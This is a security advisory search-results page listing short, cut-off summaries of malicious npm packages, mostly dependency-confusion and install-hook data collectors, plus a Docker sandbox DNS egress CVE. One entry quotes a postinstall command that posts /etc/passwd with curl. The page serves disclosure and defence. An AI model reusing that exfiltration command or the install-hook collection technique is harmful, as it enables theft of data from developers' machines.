124 matches found
Malicious code in respects-switch (npm)
respects-switch is a dependency confusion proof-of-concept package published to the public npm registry by the account r0binak and self-labeled "Security research PoC - Dependency Confusion Hunter". It was published at the artificially high version 999.0.0, the canonical floating-version bait use...
MAL-2026-6257 Malicious code in crud-respect (npm)
crud-respect is a dependency confusion proof-of-concept package published to the public npm registry by the account r0binak and self-labeled "Security research PoC - Dependency Confusion Hunter". It was published at the artificially high version 999.99.99, a floating-version bait used to outrank ...
CVE-2026-12039
Docker Sandboxes sbx enforces an HTTP/S-only egress allowlist but does not apply it to DNS resolution: the per-network embedded DNS server forwards any queried name to the host resolver whenever the network is internet-connected, without consulting the policy. A workload inside a sandbox, which t...
Malicious code in carousel-controller-mixin (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c1a4b1be297682ca77d8a92fc502887ee6d718a5541fa88413acdc6accb3ed97 package.json declares both preinstall and postinstall hooks that execute callback.js on every install. callback.js collects username, uid, hostname,...
MAL-2026-5856 Malicious code in carousel-controller-mixin (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c1a4b1be297682ca77d8a92fc502887ee6d718a5541fa88413acdc6accb3ed97 package.json declares both preinstall and postinstall hooks that execute callback.js on every install. callback.js collects username, uid, hostname,...
Malicious code in xy-shared (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d631443367624273d8b7d3347b2e173a72f3f7447424f25424dab8e68c4b1a25 package.json wires both preinstall and postinstall to node callback.js, which auto-executes on npm install. callback.js collects username, uid/gid,...
MAL-2026-5746 Malicious code in xy-shared (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d631443367624273d8b7d3347b2e173a72f3f7447424f25424dab8e68c4b1a25 package.json wires both preinstall and postinstall to node callback.js, which auto-executes on npm install. callback.js collects username, uid/gid,...
Malicious code in node-multi-downloader (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8fc720cd970f4d19212ca90945b7fc1e4e1c64da98235ff595b3792ae69e3e68 On npm install, this package's postinstall hook node index.js hex-encodes the installer's current working directory, the first 15 entries of that...
Malicious code in @klapp-otp/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9246974efd1a626094dd3f2027df2e8f1468ce45ebcba42e5207a06c5c9e16ee On npm install, this package auto-executes index.js via the preinstall lifecycle hook. The script collects os.hostname, os.userInfo, dirname,...
Malicious code in @nstrlabs/sdk (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a0b1375de7b44594cd3760efb91cb94c8c8b7137322f4597114e314ce5e14e45 On npm install, package.json runs preinstall: node index.js || true, unconditionally executing index.js. The script collects host identity fields...
Malicious code in @payment-review/store (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2d624eaefbb0245bf0c9a7b598c461a3ba5ec48005cfec223898062741ef8c2e package.json declares preinstall: node index.js || true, so installing the package automatically runs index.js on npm install. The script collects ho...
MAL-2026-5427 Malicious code in @payment-review/store (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2d624eaefbb0245bf0c9a7b598c461a3ba5ec48005cfec223898062741ef8c2e package.json declares preinstall: node index.js || true, so installing the package automatically runs index.js on npm install. The script collects ho...
Malicious code in @klapp-login-platform/native-sdk (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3b3bc8633d15b44abc90074d3362fd9399f53d10a88e24264caee9d924a72bb6 On npm install, the package's preinstall lifecycle hook runs node index.js, which collects installer-side identifiers — os.hostname,...
MAL-2026-5413 Malicious code in @klapp-login-platform/native-sdk (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3b3bc8633d15b44abc90074d3362fd9399f53d10a88e24264caee9d924a72bb6 On npm install, the package's preinstall lifecycle hook runs node index.js, which collects installer-side identifiers — os.hostname,...
MAL-2026-5415 Malicious code in @klapp-login-platform/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ffe05a6af27bd4b583c0284a40129eb63f4dcb4a6197e74195a8bb85bf71d1e7 On npm install, the package's preinstall lifecycle hook executes index.js, which collects the installer's hostname, username, package install path...
Malicious code in @easy-entry/outside-registration-fop-navigator (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 04091b4e3c6018586c8ba0c6106ff9177090d0776d1a723d041a76d67b1c8f2b On npm install, package.json's postinstall hook executes node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd'...
Malicious code in @oplus/obus-web-sdk (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 956ecc19633177f7ef9b458e6407ffbba6c8366688249c07bfd7f3c8e85c17a9 On npm install, the package's scripts/postinstall.js collects the installer's username os.userInfo, hostname os.hostname, current working directory...
Malicious code in @oplus/obus-web-sdk-plugin-recovery (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a7435b09e6ec064fe7ff0738becd8dd3445f1a73e97427a8fb9285460bd4f723 @oplus/[email protected] publishes to a likely-private internal scope at an artificially high version to win resolution against a...
MAL-2026-5426 Malicious code in @oplus/obus-web-sdk-plugin-recovery (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a7435b09e6ec064fe7ff0738becd8dd3445f1a73e97427a8fb9285460bd4f723 @oplus/[email protected] publishes to a likely-private internal scope at an artificially high version to win resolution against a...
Malicious code in @oplus/obus-core (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ed41b3738a8034ebb2e92744dd0891812f6c6fdb278e78c377045a86f2b5a34d On npm install, scripts/postinstall.js collects the installer's username os.userInfo, hostname os.hostname, current working directory process.cwd, an...